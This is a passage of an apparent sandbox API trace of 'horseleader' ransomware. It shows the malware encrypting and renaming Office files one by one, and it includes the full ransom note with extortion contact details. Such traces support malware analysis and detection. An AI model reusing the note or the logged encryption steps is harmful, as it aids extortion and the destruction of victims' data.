lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.353] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 110 [0244.353] StrStrW (lpFirst="AccessMUI.XML", lpSrch=".txt") returned 0x0 [0244.353] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1349) returned 1 [0244.353] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x545, lpOverlapped=0x0) returned 1 
[0244.355] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffabb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.355] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x545, lpOverlapped=0x0) returned 1 [0244.355] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.355] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.356] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.356] CloseHandle (hObject=0x15c) returned 1 [0244.356] GetProcessHeap () returned 0x780000 [0244.356] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.356] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.horseleader") returned 122 [0244.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup 
controller\\access.en-us\\accessmui.xml.horseleader")) returned 1 [0244.357] GetProcessHeap () returned 0x780000 [0244.357] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.357] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="AccessMUISet.XML", cAlternateFileName="ACCESS~2.XML")) returned 1 [0244.357] lstrcmpiW (lpString1="AccessMUISet.XML", lpString2="Windows") returned -1 [0244.357] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 113 [0244.357] StrStrIW (lpFirst="AccessMUISet.XML", lpSrch=".horseleader") returned 0x0 [0244.357] lstrcmpW (lpString1="AccessMUISet.XML", lpString2="#Decrypt#.txt") returned 1 [0244.357] lstrcmpW (lpString1="AccessMUISet.XML", lpString2="_uninstalling_.png") returned 1 [0244.357] lstrlenW (lpString=".testttjffg") returned 11 [0244.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML", lpSrch=".testttjffg") returned 0x0 [0244.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.358] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.359] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 113 [0244.359] StrStrW (lpFirst="AccessMUISet.XML", lpSrch=".txt") returned 0x0 [0244.359] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=819) returned 1 [0244.359] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x333, lpOverlapped=0x0) returned 1 [0244.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.361] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x333, lpOverlapped=0x0) returned 1 [0244.361] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.361] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.362] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.362] CloseHandle 
(hObject=0x15c) returned 1 [0244.362] GetProcessHeap () returned 0x780000 [0244.362] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.362] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.horseleader") returned 125 [0244.362] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.horseleader")) returned 1 [0244.363] GetProcessHeap () returned 0x780000 [0244.363] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.363] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc111bb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.363] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.363] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 106 
[0244.363] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.363] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.363] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.363] lstrlenW (lpString=".testttjffg") returned 11 [0244.364] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.364] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.364] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.365] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML") returned 106 [0244.365] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.365] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2624) returned 1 [0244.365] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0xa40, lpOverlapped=0x0) returned 1 [0244.367] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff5c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.367] 
WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0xa40, lpOverlapped=0x0) returned 1 [0244.367] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.367] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.368] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.368] CloseHandle (hObject=0x15c) returned 1 [0244.368] GetProcessHeap () returned 0x780000 [0244.368] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.368] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.horseleader") returned 118 [0244.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\setup.xml.horseleader")) returned 1 [0244.369] GetProcessHeap () returned 0x780000 [0244.369] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 
[0244.369] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc111bb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.369] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.369] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\#Decrypt#.txt") returned 110 [0244.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.370] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.370] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.371] lstrlenA (lpString="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") returned 1368 [0244.371] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.371] CloseHandle (hObject=0x1a4) returned 1 [0244.371] GetProcessHeap () returned 0x780000 [0244.371] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.371] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Excel.en-us", cAlternateFileName="EXCEL~1.EN-")) returned 1 [0244.371] lstrcmpiW (lpString1="Excel.en-us", lpString2="Windows") returned -1 [0244.371] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us") returned 95 [0244.371] lstrcmpW (lpString1="Excel.en-us", lpString2=".") returned 1 [0244.371] lstrcmpW (lpString1="Excel.en-us", lpString2="..") returned 1 [0244.372] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 
[0244.372] GetProcessHeap () returned 0x780000 [0244.372] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.372] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*") returned 97 [0244.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.372] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.372] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\.") returned 97 [0244.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.372] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="..", cAlternateFileName="")) returned 1 [0244.372] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.372] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\..") returned 98 [0244.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.372] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="ExcelMUI.XML", cAlternateFileName="")) returned 1 [0244.372] lstrcmpiW (lpString1="ExcelMUI.XML", lpString2="Windows") returned -1 [0244.372] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 108 [0244.372] StrStrIW (lpFirst="ExcelMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.373] lstrcmpW (lpString1="ExcelMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.373] lstrcmpW (lpString1="ExcelMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.373] lstrlenW (lpString=".testttjffg") returned 11 [0244.373] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.373] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.373] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.373] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 108 [0244.373] StrStrW (lpFirst="ExcelMUI.XML", lpSrch=".txt") returned 0x0 [0244.373] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1565) returned 1 [0244.373] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x61d, lpOverlapped=0x0) returned 1 [0244.375] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.375] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x61d, lpOverlapped=0x0) returned 1 [0244.375] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.376] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.376] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.376] CloseHandle (hObject=0x15c) 
returned 1 [0244.376] GetProcessHeap () returned 0x780000 [0244.376] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.376] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.horseleader") returned 120 [0244.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.horseleader")) returned 1 [0244.377] GetProcessHeap () returned 0x780000 [0244.377] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.377] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.377] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.377] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 105 [0244.377] StrStrIW (lpFirst="SETUP.XML", 
